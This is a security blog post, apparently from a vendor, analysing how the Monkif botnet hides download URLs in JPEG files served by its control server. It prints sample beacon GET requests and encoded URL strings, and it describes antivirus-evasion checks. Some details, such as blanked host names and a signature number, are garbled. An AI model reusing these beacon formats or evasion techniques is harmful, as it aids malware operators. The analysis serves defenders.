The Latest in IT Security

Monkif Botnet Hides Commands in JPEGs


As we see new threats arrive daily employing unique and complex capabilities, it is surprising to find a Swedish bot using a control server that was active in 2009. Generally malware authors keep changing their control servers-especially after reports about them surface-but not in this case. This network belongs to, which hosts at IP address and is an Internet service provider.

Here is a quote from their English website:

Refugee hosting
Our boundless commitment to free speech has been tested and proven over and over again. If it is legal in Sweden, we will host it, and will keep it up regardless of any pressure to take it down. We have ZERO tolerance against SPAM and related services!

This botnet is Monkif, which uses stealth techniques to hide its commands. It receives download URLs encrypted in JPEG files to avoid detection by network intrusion prevention systems. We have also found some samples that use SSL communications to download other threats.

The site is also hosted on same network, at IP

Figure 1. GET request with control server.

Figure 2. SSL communication with control server.

Figure 3. SSL certificate.

The botnet is installed as plug-in or browser helper object. As a check, it enumerates all running programs to compare them with their parent process names and antivirus or firewall programs to avoid detection while executing. The names of these security programs are encrypted in the binary with different algorithms from sample to sample.

Further to evade detection, the Monkif generates random filename and other encoded parameters:

GET /photo/lfzt.php?rzj=51<75=26x644646x4x4x4x524x7x0x6x5x5772=716?5772=70<x

GET /babynot/pzj.php?dnr=722576<x644420x4x4x4x0x

GET /sodoma/xcgyscm.php?gquo=<<<6<4x644475x4x4

GET /karaq/mueoyisc.php?wgau=127=27?64446<x4x4x4x53

The response to these requests is an image file. Monkif parses the first 32 bytes of the JPEG header by comparing embedded 32 bytes as header in the sample. It then decodes the remaining bytes, which is a URL for downloading a malicious file.

Figure 4 The control server responds with an image file.

The decryption follows:

Figure 4b Decrypting the JPEG to reveal the URL for a malicious download.

(Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9`<5a2<6ge<a323b5gf5b4=610fb=gga4″bm`9560″591595907|200041|0|0|0|0


(Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9faf<<“6g`eefb0`63=64143`g6=b<<5″bm`9560″591753617|200042|0|0|0|0


Encoded) lppt>++<<*<4*3*516+`+`h*tlt;bh9b3`5a<0423ag11`=a14b4`=5f<520e25″bm`9561″591925694|200044|0|0|0|0


In response to the preceding request, Monkif downloads another executable. We currently see the botnet downloading adware files, but it may download other complex threats as well.

Figure 5 Downloading another malicious file.

McAfee customers are protected by signature 0?48807500.

Leave a reply


MONDAY, JULY 15, 2024

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments